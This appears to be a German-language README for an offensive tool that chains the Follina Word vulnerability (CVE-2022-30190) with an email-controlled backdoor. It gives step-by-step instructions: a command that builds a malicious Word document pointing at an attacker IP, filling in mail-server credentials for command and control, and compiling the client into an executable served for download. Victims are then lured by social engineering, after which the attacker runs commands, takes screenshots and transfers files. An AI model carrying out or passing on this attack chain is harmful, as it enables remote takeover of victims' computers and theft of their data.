AmzWord
eine automatisierte Angriffskette basierend auf CVE-2022-30190, 163-E-Mail-Backdoor und Bild-Steganographie
Dank der folgenden GitHub-Repositories haben wir Teile des Codes referenziert und modifiziert, um unsere Arbeit zu integrieren und umzusetzen:
中文README请看这里
Voraussetzungen
gdog:
- Python 2.7
- PyCrypto-Modul
- WMI-Modul
- Enum34-Modul
- Netifaces-Modul
follina:
Nutzung & Angriffsablauf
-
Verwenden Sie follina.py, um eine bösartige Word-Datei zu erstellen und die HTTP-Überwachung zu aktivieren
- Sie können den Standardnamen und die Standard-IP im Code ändern
- Sie können auch
--ip und --output verwenden, um sie anzugeben
- Detaillierte Verwendung finden Sie unter follina. Wir haben die Benutzeroberfläche nicht geändert.
- z.B.:
python follina.py --ip 100.100.100.100 --output maldoc.doc
-
Ändern Sie client.py und gdog.py unter gdog und füllen Sie die folgenden Informationen aus
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
-
Kompilieren Sie client.py zu tar.exe und legen Sie es unter /follina/www ab
-
Verwenden Sie eine beliebige Social-Engineering-Methode, um es an das Ziel zu senden. Sobald das Opfer Word öffnet, wird tar.exe automatisch heruntergeladen und ausgeführt.
-
Der Angreifer führt gdog lokal aus und sendet Befehle, um den Zielrechner zu steuern. Zur Nutzung siehe gdog
Anmerkung
- Dies ist nur eine Demo der Implementierung der Angriffskette. Die ausgeführte exe kann sogar im Task-Manager gefunden werden, was die Beobachtung des Effekts erleichtert. Wir haben keine Anti-Virus-, Versteck- oder Privilegieneskalationsmaßnahmen durchgeführt. Diese sind unter Windows natürlich kein Problem, oder?
- Das gdog-Projekt existiert schon lange, und wir haben viel Arbeit investiert, um es erfolgreich zum Laufen zu bringen. Die bisher bestätigten Fernsteuerungsbefehle umfassen: Befehle ausführen, Screenshots machen, Pop-up-Fenster, Herunterfahren, Bildschirm sperren und Dateien übertragen. Diese Funktionen reichen für die meisten Anforderungen aus.
- Ich weiß nicht warum, aber es scheint ein Problem mit der SUBJECT-Suche von IMAP zu geben. Wir können keine E-Mails mit dem betreffenden Betreff finden, und der Rückgabewert ist leer. Wir müssen andere Methoden anwenden, z. B. alle ungelesenen E-Mails lesen, die Zielmails herausfiltern und die anderen dann wieder als ungelesen markieren. Dies kann bei vielen gesteuerten Benutzern zu Problemen führen und muss gelöst werden.
- Dieses Projekt dient nur zu Lern- und Austauschzwecken.